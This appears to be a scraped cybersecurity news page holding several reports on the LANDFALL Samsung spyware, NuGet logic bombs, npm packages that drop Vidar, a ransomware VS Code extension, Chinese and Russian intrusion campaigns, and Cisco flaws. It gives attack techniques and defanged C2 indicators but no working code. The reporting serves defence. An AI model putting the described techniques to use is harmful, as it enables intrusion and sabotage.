Category: Cybersecurity

A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a “commercial-grade” Android spyware dubbed LANDFALL in targeted attacks in the Middle East.

The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the “libimagecodec.quram.so” component that could allow remote attackers to execute arbitrary code, according to Palo Alto Networks Unit 42. The issue was addressed by Samsung in April 2025.

“This vulnerability was actively exploited in the wild before Samsung patched it in April 2025, following reports of in-the-wild attacks,” Unit 42 said. Potential targets of the activity, tracked as CL-UNK-1054, are located in Iraq, Iran, Turkey, and Morocco based on VirusTotal submission data.

The development comes as Samsung disclosed in September 2025 that another flaw in the same library (CVE-2025-21043, CVSS score: 8.8) had also been exploited in the wild as a zero-day. There is no evidence of this security flaw being weaponized in the LANDFALL campaign. Samsung did not immediately respond to a request for comment.

It’s assessed that the attacks involved sending via WhatsApp malicious images in the form of DNG (Digital Negative) files, with evidence of LANDFALL samples going all the way back to July 23, 2024. This is based on DNG artifacts bearing names like “WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg” and “IMG-20240723-WA0000.jpg.”

Itay Cohen, senior principal researcher at Palo Alto Networks Unit 42, told The Hacker News that they have not observed any significant functional changes between the samples from July 2024 and February 2025, when the most recent LANDFALL artifact was uploaded to VirusTotal.

LANDFALL, once installed and executed, acts as a comprehensive spy tool, capable of harvesting sensitive data, including microphone recording, location, photos, contacts, SMS, files, and call logs.

While Unit 42 said the exploit chain may have involved the use of a zero-click approach to trigger the exploitation of CVE-2025-21042 without requiring any user interaction, there are currently no indications that it has happened or there exists an unknown security issue in WhatsApp to support this hypothesis.

The Android spyware is specifically designed to target Samsung’s Galaxy S22, S23, and S24 series devices, as well as Z Fold 4 and Z Flip 4, covering some of the flagship devices from the South Korean electronics chaebol, with the exception of the latest generation.

Flowchart for LANDFALL spyware

It’s worth noting that around the same time WhatsApp disclosed that a flaw in its messaging app for iOS and macOS (CVE-2025-55177, CVSS score: 5.4) was chained along with CVE-2025-43300 (CVSS score: 8.8), a flaw in Apple iOS, iPadOS, and macOS, to potentially target less than 200 users as part of a sophisticated campaign. Apple and WhatsApp have since patched the flaws.

Timeline for recent malicious DNG image files and associated exploit activity

Unit 42’s analysis of the discovered DNG files show that they come with an embedded ZIP file appended to the end of the file, with the exploit being used to extract a shared object library from the archive to run the spyware. Also present in the archive is another shared object that’s designed to manipulate the device’s SELinux policy to grant LANDFALL elevated permissions and facilitate persistence.

The shared object that loads LANDFALL also communicates with a command-and-control (C2) server over HTTPS to enter into a beaconing loop and receive unspecified next-stage payloads for subsequent execution.

“At this point, we can’t share details about the next-stage payloads delivered from the C2 server,” Cohen said. “What we can say is that LANDFALL is a modular spyware framework — the loader we analyzed is clearly designed to fetch and execute additional components from the C2 infrastructure. Those later stages likely extend its surveillance and persistence capabilities, but they weren’t recovered in the samples available to us.”

It’s currently not known who is behind the spyware or the campaign. That said, Unit 42 said LANDFALL’s C2 infrastructure and domain registration patterns dovetail with that of Stealth Falcon (aka FruityArmor), although, as of October 2025, no direct overlaps between the two clusters have been detected.

The findings suggest that the delivering LANDFALL is likely part of a broader DNG exploitation wave that also hit iPhone devices via the aforementioned exploit chains. They also highlight how sophisticated exploits can remain accessible in public repositories for extended periods of time, flying under the radar until they can be fully analyzed.

“We don’t believe this specific exploit is still being used, since Samsung patched it in April 2025,” Cohen said. “However, related exploit chains affecting Samsung and iOS devices were observed as recently as August and September, indicating that similar campaigns remained active until very recently. Some infrastructure that might be related to LANDFALL also remains online, which could suggest ongoing or follow-on activity by the same operators.”

(The story was updated after publication to clarify details surrounding the use of WhatsApp as a distribution vector for the malware and additional insights from Unit 42.)

Nov 07, 2025Ravie LakshmananMobile Security / Vulnerability

A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a “commercial-grade” Android spyware dubbed LANDFALL in targeted attacks in the Middle East.

The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the “libimagecodec.quram.so” component that could allow remote attackers to execute arbitrary code, according to Palo Alto Networks Unit 42. The issue was addressed by Samsung in April 2025.

“This vulnerability was actively exploited in the wild before Samsung patched it in April 2025, following reports of in-the-wild attacks,” Unit 42 said. Potential targets of the activity, tracked as CL-UNK-1054, are located in Iraq, Iran, Turkey, and Morocco based on VirusTotal submission data.

The development comes as Samsung disclosed in September 2025 that another flaw in the same library (CVE-2025-21043, CVSS score: 8.8) had also been exploited in the wild as a zero-day. There is no evidence of this security flaw being weaponized in the LANDFALL campaign.

It’s assessed that the attacks involved sending via WhatsApp malicious images in the form of DNG (Digital Negative) files, with evidence of LANDFALL samples going all the way back to July 23, 2024. This is based on DNG artifacts bearing names like “WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg” and “IMG-20240723-WA0000.jpg.”

LANDFALL, once installed and executed, acts as a comprehensive spy tool, capable of harvesting sensitive data, including microphone recording, location, photos, contacts, SMS, files, and call logs. The exploit chain is said to have likely involved the use of a zero-click approach to trigger exploitation of CVE-2025-21042 without requiring any user interaction.

Flowchart for LANDFALL spyware

It’s worth noting that around the same time WhatsApp disclosed that a flaw in its messaging app for iOS and macOS (CVE-2025-55177, CVSS score: 5.4) was chained along with CVE-2025-43300 (CVSS score: 8.8), a flaw in Apple iOS, iPadOS, and macOS, to potentially target less than 200 users as part of a sophisticated campaign. Apple and WhatsApp have since patched the flaws.

Timeline for recent malicious DNG image files and associated exploit activity

Unit 42’s analysis of the discovered DNG files show that they come with an embedded ZIP file appended to the end of the file, with the exploit being used to extract a shared object library from the archive to run the spyware. Also present in the archive is another shared object that’s designed to manipulate the device’s SELinux policy to grant LANDFALL elevated permissions and facilitate persistence.

The shared object that loads LANDFALL also communicates with a command-and-control (C2) server over HTTPS to enter into a beaconing loop and receive unspecified next-stage payloads for subsequent execution.

It’s currently not known who is behind the spyware or the campaign. That said, Unit 42 said LANDFALL’s C2 infrastructure and domain registration patterns dovetail with that of Stealth Falcon (aka FruityArmor), although, as of October 2025, no direct overlaps between the two clusters have been detected.

“From the initial appearance of samples in July 2024, this activity highlights how sophisticated exploits can remain in public repositories for an extended period before being fully understood,” Unit 42 said.

A China-linked threat actor has been attributed to a cyber attack targeting an U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed at U.S. entities that are linked to or involved in policy issues.

The organization, according to a report from Broadcom’s Symantec and Carbon Black teams, is “active in attempting to influence U.S. government policy on international issues.” The attackers managed to gain access to the network for several weeks in April 2025.

The first sign of activity occurred on April 5, 2025, when mass scanning efforts were detected against a server by leveraging various well-known exploits, including CVE-2022-26134 (Atlassian), CVE-2021-44228 (Apache Log4j), CVE-2017-9805 (Apache Struts), and CVE-2017-17562 (GoAhead Web Server).

No further actions were recorded until April 16, when the attacks executed several curl commands to test internet connectivity, after which the Windows command-line tool netstat was executed to collect network configuration information. This was followed by setting up persistence on the host by means of a scheduled task.

The task was designed to execute a legitimate Microsoft binary “msbuild.exe” to run an unknown payload, as well as create another scheduled task that’s configured to run every 60 minutes as a high-privileged SYSTEM user.

This new task, Symantec and Carbon Black said, was capable of loading and injecting unknown code into “csc.exe” that ultimately established communications with a command-and-control (C2) server (“38.180.83[.]166”). Subsequently, the attackers were observed executing a custom loader to unpack and run an unspecified payload, likely a remote access trojan (RAT) in memory.

Also observed was the execution of the legitimate Vipre AV component (“vetysafe.exe”) to sideload a DLL loader (“sbamres.dll”). This component is also said to have been used for DLL side-loading in connection with Deed RAT (aka Snappybee) in prior activity attributed to Salt Typhoon (aka Earth Estries), and in attacks attributed to Earth Longzhi, a sub-cluster of APT41.

“A copy of this malicious DLL was previously used in attacks linked to the China-based threat actors known as Space Pirates,” Broadcom said. “A variant of this component, with a different filename, was also used by that Chinese APT group Kelp (aka Salt Typhoon) in a separate incident.”

Some of the other tools observed in the targeted network included Dcsync and Imjpuexc. It’s not clear how successful the attackers were in their efforts. No additional activity was registered after April 16, 2025.

“It is clear from the activity on this victim that the attackers were aiming to establish a persistent and stealthy presence on the network, and they were also very interested in targeting domain controllers, which could potentially allow them to spread to many machines on the network,” Symantec and Carbon Black said.

“The sharing of tools among groups has been a long-standing trend among Chinese threat actors, making it difficult to say which specific group is behind a set of activities.”

The disclosure comes as a security researcher who goes by the online moniker BartBlaze disclosed Salt Typhoon’s exploitation of a security flaw in WinRAR (CVE-2025-8088) to initiate an attack chain that sideloads a DLL responsible for running shellcode on the compromised host. The final payload is designed to establish contact with a remote server (“mimosa.gleeze[.]com”).

Activity from Other Chinese Hacking Groups

According to a report from ESET, China-aligned groups have continued to remain active, striking entities across Asia, Europe, Latin America, and the U.S. to serve Beijing’s geopolitical priorities. Some of the notable campaigns include –

• The targeting of the energy sector in Central Asia by a threat actor codenamed Speccom in July 2025 via phishing emails to deliver a variant of BLOODALCHEMY and custom backdoors such as kidsRAT and RustVoralix.
• The targeting of European organizations by a threat actor codenamed DigitalRecyclers in July 2025, using an unusual persistence technique that involved the use of the Magnifier accessibility tool to gain SYSTEM privileges.
• The targeting of governmental entities in Latin America (Argentina, Ecuador, Guatemala, Honduras, and Panama) between June and September 2025 by a threat actor codenamed FamousSparrow that likely exploited ProxyLogon flaws in Microsoft Exchange Server to deploy SparrowDoor.
• The targeting of a Taiwanese company in the defense aviation sector, a U.S. trade organization based in China, and the China-based offices of a Greek governmental entity, and an Ecuadorian government body between May and September 2025 by a threat actor codenamed SinisterEye (aka LuoYu and Cascade Panda) to deliver malware like WinDealer (for Windows) and SpyDealer (for Android) using adversary-in-the-middle (AitM) attacks to hijack legitimate software update mechanisms.
• The targeting of a Japanese company and a multinational enterprise, both in Cambodia, in June 2025 by a threat actor codenamed PlushDaemon by means of AitM poisoning to deliver SlowStepper.

“PlushDaemon achieves AitM positioning by compromising network devices such as routers, and deploying a tool that we have named EdgeStepper, which redirects DNS traffic from the targeted network to a remote, attacker-controlled DNS server,” ESET said.

“This server responds to queries for domains associated with software update infrastructure with the IP address of the web server that performs the update hijacking and ultimately serves PlushDaemon’s flagship backdoor, SlowStepper.”

Chinese Hacking Groups Target Misconfigured IIS Servers

In recent months, threat hunters have also spotted a Chinese-speaking threat actor targeting misconfigured IIS servers using publicly exposed machine keys to install a backdoor called TOLLBOOTH (aka HijackServer) that comes with SEO cloaking and web shell capabilities.

“REF3927 abuses publicly disclosed ASP.NET machine keys to compromise IIS servers and deploy TOLLBOOTH SEO cloaking modules globally,” Elastic Security Labs researchers said in a report published late last month. Per HarfangLab, the operation has infected hundreds of servers around the world, with infections concentrated in India and the U.S.

The attacks are also characterized by attempts to weaponize the initial access to drop the Godzilla web shell, execute GotoHTTP remote access tool, use Mimikatz to harvest credentials, and deploy HIDDENDRIVER, a modified version of the open source rootkit Hidden, to conceal the presence of malicious payloads on the infected machine.

It’s worth pointing out that the cluster is the latest addition to a long list of Chinese threat actors, such as GhostRedirector, Operation Rewrite, and UAT-8099, that have targeted IIS servers, indicating a surge in such activity.

“While the malicious operators appear to be using Chinese as their main language and leveraging the compromises to support search engine optimization (SEO), we notice that the deployed module offers a persistent and unauthenticated channel which allows any party to remotely execute commands on affected servers,” the French cybersecurity company said.

Nov 07, 2025Ravie LakshmananSupply Chain Attack / Malware

A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems.

According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named “shanhai666” and are designed to run malicious code after specific trigger dates in August 2027 and November 2028. The packages were collectively downloaded 9,488 times.

“The most dangerous package, Sharp7Extend, targets industrial PLCs with dual sabotage mechanisms: immediate random process termination and silent write failures that begin 30-90 minutes after installation, affecting safety-critical systems in manufacturing environments,” security researcher Kush Pandya said.

The list of malicious packages is below –

• MyDbRepository (Last updated on May 13, 2023)
• MCDbRepository (Last updated on June 5, 2024)
• Sharp7Extend (Last updated on August 14, 2024)
• SqlDbRepository (Last updated on October 24, 2024)
• SqlRepository (Last updated on October 25, 2024)
• SqlUnicornCoreTest (Last updated on October 26, 2024)
• SqlUnicornCore (Last updated on October 26, 2024)
• SqlUnicorn.Core (Last updated on October 27, 2024)
• SqlLiteRepository (Last updated on October 28, 2024)

Socket said all nine rogue packages work as advertised, allowing the threat actors to build trust among downstream developers who may end up downloading them without realizing they come embedded with a logic bomb inside that’s scheduled to detonate in the future.

The threat actor has been found to publish a total of 12 packages, with the remaining three working as intended without any malicious functionality. All of them have been removed from NuGet. Sharp7Extend, the company added, is designed to target users of the legitimate Sharp7 library, a .NET implementation for communicating with Siemens S7 programmable logic controllers (PLCs).

While bundling Sharp7 into the NuGet package lends it a false sense of security, it belies the fact that the library stealthily injects malicious code when an application performs a database query or PLC operation by exploiting C# extension methods.

“Extension methods allow developers to add new methods to existing types without modifying the original code – a powerful C# feature that the threat actor weaponizes for interception,” Pandya explained. “Each time an application executes a database query or PLC operation, these extension methods automatically execute, checking the current date against trigger dates (hardcoded in most packages, encrypted configuration in Sharp7Extend).”

Once a trigger date is passed, the malware terminates the entire application process with a 20% probability. In the case of Sharp7Extend, the malicious logic is activated immediately following installation and continues until June 6, 2028, when the termination mechanism stops by itself.

The package also includes a feature to sabotage write operations to the PLC 80% of the time after a randomized delay of anywhere between 30 to 90 minutes. This also means that both the triggers – the random process terminations and write failures – are operational in tandem once the grace period elapses.

Certain SQL Server, PostgreSQL, and SQLite implementations associated with other packages, on the other hand, are set to trigger on August 8, 2027, (MCDbRepository) and November 29, 2028 (SqlUnicornCoreTest and SqlUnicornCore).

“This staggered approach gives the threat actor a longer window to collect victims before the delayed-activation malware triggers, while immediately disrupting industrial control systems,” Pandya said.

It’s currently not known who is behind the supply chain attack, but Socket said source code analysis and the choice of the name “shanhai666” suggest that it may be the work of a threat actor, possibly of Chinese origin.

“This campaign demonstrates sophisticated techniques rarely combined in NuGet supply chain attacks,” the company concluded. “Developers who installed packages in 2024 will have moved to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution disguises systematic attacks as random crashes or hardware failures.”

“This makes incident response and forensic investigation nearly impossible, organizations cannot trace the malware back to its introduction point, identify who installed the compromised dependency, or establish a clear timeline of compromise, effectively erasing the attack’s paper trail.”

Nov 07, 2025The Hacker NewsData Protection / Cloud Security

Imagine this: Sarah from accounting gets what looks like a routine password reset email from your organization’s cloud provider. She clicks the link, types in her credentials, and goes back to her spreadsheet. But unknown to her, she’s just made a big mistake. Sarah just accidentally handed over her login details to cybercriminals who are laughing all the way to their dark web marketplace, where they’ll sell her credentials for about $15. Not much as a one-off, but a serious money-making operation when scaled up.

The credential compromise lifecycle

1. Users create credentials: With dozens of standalone business apps (each with its own login) your employees must create numerous accounts. But keeping track of multiple unique usernames/passwords is a pain, so they reuse passwords or make tiny variations.
2. Hackers compromise credentials: Attackers snag these credentials through phishing, brute force attacks, third-party breaches, or exposed API keys. And many times, nobody even notices that it’s happened.
3. Hackers aggregate and monetize credentials: Criminal networks dump stolen credentials into massive databases, then sell them on underground markets. Hackers sell your company’s login details to the highest bidder.
4. Hackers distribute and weaponize credentials: Buyers spread these credentials across criminal networks. Bots test them against every business app they can find, while human operators cherry-pick the most valuable targets.
5. Hackers actively exploit credentials: Successful logins let attackers dig in, escalate privileges, and start their real work — data theft, ransomware, or whatever pays best. By the time you notice weird login patterns or unusual network activity, they could have already been inside for days, weeks, or even longer.

Common compromise vectors

Criminals have no shortage of ways to get their hands on your company’s user credentials:

• Phishing campaigns: Attackers craft fake emails that look legit — complete with stolen company logos and convincing copy. Even your most security-conscious employees can be fooled by these sophisticated scams.
• Credential stuffing: Attackers grab passwords from old breaches, then test them everywhere. A 0.1% hacking success rate may sound tiny, but with rampant password reuse and the fact that hackers are testing millions of credentials per hour, it quickly adds up.
• Third-party breaches: When LinkedIn gets hacked, attackers don’t just target LinkedIn users — they test those same credentials against all kinds of other business apps. Your company may have the most robust security in the world, but you’re still vulnerable if users are reusing credentials.
• Leaked API keys: Developers accidentally publish credentials in GitHub repos, config files, and documentation. Automated bots scan for these 24/7, scooping them up within minutes.

Just like a car theft ring has different players — from the street-level thieves grabbing cars to the chop shop operators and overseas exporters — the credential theft ecosystem has bad actors who want different things from your stolen credentials. But knowing their game can help you better defend your organization.

Opportunistic fraudsters want quick cash. They’ll drain bank accounts, make fraudulent purchases, or steal crypto. They aren’t picky – if your business credentials work on consumer sites, they’ll use them.

Automated botnets are credential-testing machines that never sleep. They throw millions of username/password combos at thousands of websites, looking for anything that sticks. The name of their game is volume, not precision.

Then criminal marketplaces act as middlemen who buy stolen credentials in bulk and resell them to end users. Think of them as the eBay of cybercrime, with search functions that let buyers easily hunt for your organization’s data.

Organized crime groups treat your credentials like strategic weapons. They’ll sit on access for months, mapping your network and planning big-ticket attacks like ransomware or IP theft. These are the kind of professionals who turn single credential compromises into million-dollar disasters.

Real-world impact

Once attackers get their hands on a set of working credentials, the damage starts fast and spreads everywhere:

• Account takeover: Hackers waltz right past your security controls with legitimate access. They’re reading emails, grabbing customer data, and sending messages that look like they’re coming from your employees.
• Lateral movement: One compromised account quickly becomes ten, then fifty. Attackers hop through your network, escalating privileges and mapping out your most valuable systems.
• Data theft: Attackers focus on identifying your crown jewels — customer databases, financial records, trade secrets — and siphoning them off through channels that appear normal to your monitoring tools.
• Resource abuse: Your cloud bill explodes as attackers spin up crypto mining operations, send spam through your email systems, or burn through API quotas for their own projects.
• Ransomware deployment: If hackers are looking for a major payout, they often turn to ransomware. They encrypt everything important and demand payment, knowing you’ll likely pay because restoration from backups takes forever — and is far from a cheap process.

But that’s just the beginning. You could also be looking at regulatory fines, lawsuits, massive remediation costs, and a reputation that takes years to rebuild. In fact, many organizations never fully recover from a major credential compromise incident.

Take action now

The reality is that some of your company’s user credentials are likely already compromised. And the longer the exposed credentials sit out undetected, the bigger the target on your back.

Make it a priority to find your compromised credentials before the criminals use them. For example, Outpost24’s Credential Checker is a free tool that shows you how often your company’s email domain appears in leak repositories, observed channels or underground marketplaces. This no-cost, no-registration check doesn’t display or save individual compromised credentials; it simply makes you aware of your level of risk. Check your domain for leaked credentials now.

Nov 07, 2025Ravie LakshmananData Protection / Malware

Google on Thursday said it’s rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad reviews on the platform and demand ransoms to remove the negative comments.

The approach is designed to tackle a common practice called review bombing, where online users intentionally post negative user reviews in an attempt to harm a product, a service, or a business.

“Bad actors try to circumvent our moderation systems and flood a business’s profile with fake one-star reviews,” Laurie Richardson, vice president of Trust & Safety at Google, said. “Following this initial attack, the scammers directly contact the business owner, often through third-party messaging apps, to demand payment.”

The threat actors warn of further escalation should the victim fail to pay the fee, risking potential damage to their public rating and reputation. These ploys are seen as an attempt to coerce merchants into paying the extortion demand.

Google has also warned users of other kinds of scams that are prevalent today –

• Online job scams, where fraudsters impersonate legitimate job boards to target people looking for employment using fake postings and recruiter profiles to trick them into providing sensitive data under the pretext of filling fake application forms and video interviews, or downloading malware like remote access trojans (RATs) or information stealers.
• AI product impersonation scams, which involve capitalizing on the popularity surrounding artificial intelligence (AI) tools to impersonate and promote popular AI services using malvertising, hijacked social media accounts, and trojanized open-source repositories that promise “free” or “exclusive” access in order to trap victims into downloading malicious mobile and desktop apps, “fleeceware” apps with hidden subscriptions, and bogus browser extensions.
• Malicious VPN apps and extensions, where threat actors distribute malicious applications disguised as legitimate VPN services across platforms using social engineering lures that leverage geopolitical events to ensnare victims who are seeking secure internet access. Once installed, these apps can act as a conduit for other payloads like information stealers, RATs, and banking malware that can steal data and drain funds from cryptocurrency wallets.
• Fraud recovery scams, which involve targeting individuals who have already been scammed by posing as asset recovery agents associated with trusted entities like law firms and government agencies, only to scam them a second time. It’s worth noting that the U.S. Federal Bureau of Investigation (FBI) issued a bulletin about this threat back in August 2025.
• Seasonal holiday scams, where threat actors exploit major holiday and shopping periods to deceive unsuspecting shoppers with counterfeit offers on social media platforms that lead to financial fraud and data theft.

To counter these schemes, users are advised to be wary of unexpected delivery texts or emails that demand a fee, exercise caution when approached by people who claim they can recover funds, download apps only from trusted sources and legitimate developers, and be vigilant when asked to fill out sensitive personal information.

The development coincides with a report from Reuters, which found that Meta is making billions of dollars every year from ad marketing scams and illegal products on its platform. Citing an internal December 2024 document, the British news agency said the scam ads could account for as much as 10.1% of its overall revenue, or approximately $16 billion.

Meta allowed “high value accounts” to “accrue more than 500 strikes without Meta shutting them down,” Reuters reported, adding “a small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it.”

In addition, the company is said to have charged bad actors higher rates more to run ads as a penalty, as they accrued more strikes, only banning advertisers if its automated systems predict they are 95% certain to be committing fraud. On average, Meta is estimated to have served its platforms’ users an estimated 15 billion “higher risk” scam advertisements every day.

In response, Meta said the 10.1% estimate was rough and overly-inclusive, and that it has removed more than 134 million pieces of scam ad content so far in 2025.

Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded.

Secure Annex researcher John Tuckner, who flagged the extension “susvsex,” said it does not attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025, by a user named “suspublisher18” along with the description “Just testing” and the email address “donotsupport@example[.]com.”

“Automatically zips, uploads, and encrypts files from C:UsersPublictesting (Windows) or /tmp/testing (macOS) on first launch,” reads the description of the extension. As of November 6, Microsoft has stepped in to remove it from the official VS Code Extension Marketplace.

According to details shared by “suspublisher18,” the extension is designed to automatically activate itself on any event, including installing or when launching VS Code, and invoke a function named “zipUploadAndEncrypt,” which creates a ZIP archive of a target directory, exfiltrates it to a remote server, and replaces the files with their encrypted versions.

“Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next,” Tuckner said.

Besides encryption, the malicious extension also uses GitHub as command-and-control (C2) by polling a private GitHub repository for any new commands to be executed by parsing the “index.html” file. The results of the command execution are written back to the same repository in the “requirements.txt” file using a GitHub access token embedded in the code.

The GitHub account associated with the repository – aykhanmv – continues to be active, with the developer claiming to be from the city of Baku, Azerbaijan.

“Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe coded’ malware,” Tuckner said. “The extension package accidentally included decryption tools, command and control server code, GitHub access keys to the C2 server, which other people could use to take over the C2.”

The disclosure comes as Datadog Security Labs unearthed 17 npm packages that masquerade as benign software development kits (SDKs) and provide the advertised functionality, but are engineered to stealthily execute Vidar Stealer on infected systems. The development marks the first time the information stealer has been distributed via the npm registry.

The cybersecurity company, which is tracking the cluster under the name MUT-4831, said some of the packages were first flagged on October 21, 2025, with subsequent uploads recorded the next day and on October 26. The names of the packages, published by accounts named “aartje” and “saliii229911,” are below –

• abeya-tg-api
• bael-god-admin
• bael-god-api
• bael-god-thanks
• botty-fork-baby
• cursor-ai-fork
• cursor-app-fork
• custom-telegram-bot-api
• custom-tg-bot-plan
• icon-react-fork
• react-icon-pkg
• sabaoa-tg-api
• sabay-tg-api
• sai-tg-api
• salli-tg-api
• telegram-bot-start
• telegram-bot-starter

While the two accounts have since been banned, the libraries were downloaded at least 2,240 times prior to them being taken down. That said, Datadog noted that many of these downloads could likely have been the result of automated scrapers.

The attack chain in itself is fairly straightforward, kicking in as part of a postinstall script specified in the “package.json” file that downloads a ZIP archive from an external server (“bullethost[.]cloud domain”) and execute the Vidar executable contained within the ZIP file. The Vidar 2.0 samples have been found to use hard-coded Telegram and Steam accounts as dead drop resolvers to fetch the actual C2 server.

In some variants, a post-install PowerShell script, embedded directly in the package.json file, is used to download the ZIP archive, after which the execution control is passed to a JavaScript file to complete the rest of the steps in the attack.

‘

“It is not clear why MUT-4831 chose to vary the postinstall script in this way,” security researchers Tesnim Hamdouni, Ian Kretz, and Sebastian Obregoso said. “One possible explanation is that diversifying implementations can be advantageous to the threat actor in terms of surviving detection.”

The discovery is just another in a long list of supply chain attacks targeting the open-source ecosystem spanning npm, PyPI, RubyGems, and Open VSX, making it crucial that developers perform due diligence, review changelogs, and watch out for techniques like typosquatting and dependency confusion before installing packages.

Nov 06, 2025Ravie LakshmananZero-Day / Vulnerability

Cisco on Wednesday disclosed that it became aware of a new attack variant that’s designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362.

“This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service (DoS) conditions,” the company said in an updated advisory, urging customers to apply the updates as soon as possible.

Both vulnerabilities were disclosed in late September 2025, but not before they were exploited as zero-day vulnerabilities in attacks delivering malware such as RayInitiator and LINE VIPER, according to the U.K. National Cyber Security Centre (NCSC).

While successful exploitation of CVE-2025-20333 allows an attacker to execute arbitrary code as root using crafted HTTP requests, CVE-2025-20362 makes it possible to access a restricted URL without authentication.

The update comes as Cisco addressed two critical security flaws in Unified Contact Center Express (Unified CCX) that could permit an unauthenticated, remote attacker to upload arbitrary files, bypass authentication, execute arbitrary commands, and elevate privileges to root.

The networking equipment major credited security researcher Jahmel Harris for discovering and reporting the shortcomings. The vulnerabilities are listed below –

• CVE-2025-20354 (CVSS score: 9.8) – A vulnerability in the Java Remote Method Invocation (RMI) process of Unified CCX that allows an attacker to upload arbitrary files and execute arbitrary commands with root permissions on an affected system.
• CVE-2025-20358 (CVSS score: 9.4) – A vulnerability in the Contact Center Express (CCX) Editor application of Unified CCX that allows an attacker to bypass authentication and obtain administrative permissions to create arbitrary scripts on the underlying operating system and execute them.

They have been addressed in the following versions –

• Cisco Unified CCX Release 12.5 SU3 and earlier (Fixed in 12.5 SU3 ES07)
• Cisco Unified CCX Release 15.0 (Fixed in 15.0 ES01)

In addition to the two vulnerabilities, Cisco has shipped patches for a high-severity DoS bug (CVE-2025-20343, CVSS score: 8.6) in Identity Services Engine (ISE) that could allow an unauthenticated, remote attacker to cause a susceptible device to restart unexpectedly.

“This vulnerability is due to a logic error when processing a RADIUS access request for a MAC address that is already a rejected endpoint,” it said. “An attacker could exploit this vulnerability by sending a specific sequence of multiple crafted RADIUS access request messages to Cisco ISE.”

While there is no evidence that any of the three security flaws have been exploited in the wild, it’s essential that users apply the updates as soon as possible for optimal protection.

Nov 06, 2025Ravie LakshmananMalware / Vulnerability

A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities.

The campaign, detected in May 2025, is tracked by the security outfit under the moniker InedibleOchotense, describing it as Russia-aligned.

“InedibleOchotense sent spear-phishing emails and Signal text messages, containing a link to a trojanized ESET installer, to multiple Ukrainian entities,” ESET said in its APT Activity Report Q2 2025–Q3 2025 shared with The Hacker News.

InedibleOchotense is assessed to share tactical overlaps with a campaign documented by EclecticIQ that involved the deployment of a backdoor called BACKORDER and by CERT-UA as UAC-0212, which it describes as a sub-cluster within the Sandworm (aka APT44) hacking group.

While the email message is written in Ukrainian, ESET said the first line uses a Russian word, likely indicating a typo or a translation error. The email, which purports to be from ESET, claims its monitoring team detected a suspicious process associated with their email address and that their computers might be at risk.

The activity is an attempt to capitalize on the widespread use of ESET software in the country and its brand reputation to trick recipients into installing malicious installers hosted on domains such as esetsmart[.]com, esetscanner[.]com, and esetremover[.]com.

The installer is designed to deliver the legitimate ESET AV Remover, alongside a variant of a C# backdoor dubbed Kalambur (aka SUMBUR), which uses the Tor anonymity network for command-and-control. It’s also capable of dropping OpenSSH and enabling remote access via the Remote Desktop Protocol (RDP) on port 3389.

It’s worth noting that CERT-UA, in a report published last month, attributed a nearly identical campaign to UAC-0125, another sub-cluster within Sandworm.

Sandworm Wiper Attacks in Ukraine

Sandworm, per ESET, has continued to mount destructive campaigns in Ukraine, launching two wiper malware tracked as ZEROLOT and Sting aimed at an unnamed university in April 2025, followed by the deployment of multiple data-wiping malware variants targeting government, energy, logistics, and grain sectors.

“During this period, we observed and confirmed that the UAC-0099 group conducted initial access operations and subsequently transferred validated targets to Sandworm for follow-up activity,” the company said. “These destructive attacks by Sandworm are a reminder that wipers very much remain a frequent tool of Russia-aligned threat actors in Ukraine.”

RomCom Exploits WinRAR 0-Day in Attacks

Another Russia-aligned threat actor of note that has been active during the time period is RomCom (aka Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), which launched spear-phishing campaigns in mid-July 2025 that weaponized a WinRAR vulnerability (CVE-2025-8088, CVSS score: 8.8) as part of attacks targeting financial, manufacturing, defense, and logistics companies in Europe and Canada.

“Successful exploitation attempts delivered various backdoors used by the RomCom group, specifically a SnipBot [aka SingleCamper or RomCom RAT 5.0] variant, RustyClaw, and a Mythic agent,” ESET said.

In a detailed profile of RomCom in late September 2025, AttackIQ characterized the hacking group as closely keeping an eye out for geopolitical developments surrounding the war in Ukraine, and leveraging them to carry out credential harvesting and data exfiltration activities likely in support of Russian objectives.

“RomCom was initially developed as an e-crime commodity malware, engineered to facilitate the deployment and persistence of malicious payloads, enabling its integration into prominent and extortion-focused ransomware operations,” security researcher Francis Guibernau said. “RomCom transitioned from a purely profit-driven commodity to become a utility leveraged in nation-state operations.”

Nov 06, 2025Ravie LakshmananCybersecurity / Hacking News

Cybercrime has stopped being a problem of just the internet — it’s becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and even trusted apps or social platforms are turning into attack vectors.

The result is a global system where every digital weakness can be turned into physical harm, economic loss, or political leverage. Understanding these links is no longer optional — it’s survival.

For a full look at the most important security news stories of the week, keep reading.

Every hack or scam has one thing in common — someone takes advantage of trust. As security teams improve their defenses, attackers quickly find new tricks. The best way to stay ahead isn’t to panic, but to stay informed, keep learning, and stay alert.

Cybersecurity keeps changing fast — and our understanding needs to keep up.